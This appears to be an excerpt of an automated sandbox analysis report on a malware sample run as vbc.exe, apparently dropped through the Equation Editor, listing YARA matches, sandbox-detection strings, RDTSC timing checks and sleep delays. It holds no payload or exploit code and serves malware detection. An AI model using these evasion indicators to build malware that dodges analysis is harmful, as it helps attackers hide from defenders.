Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match	File source: 4.2.vbc.exe.2626be0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2647ca8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2540, type: MEMORYSTR

Source: vbc.exe, 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 00000000000C8614 second address: 00000000000C861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 00000000000C89AE second address: 00000000000C89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1828	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2548	Thread sleep time: -38872s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1352	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1612	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 2812	Thread sleep time: -34000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed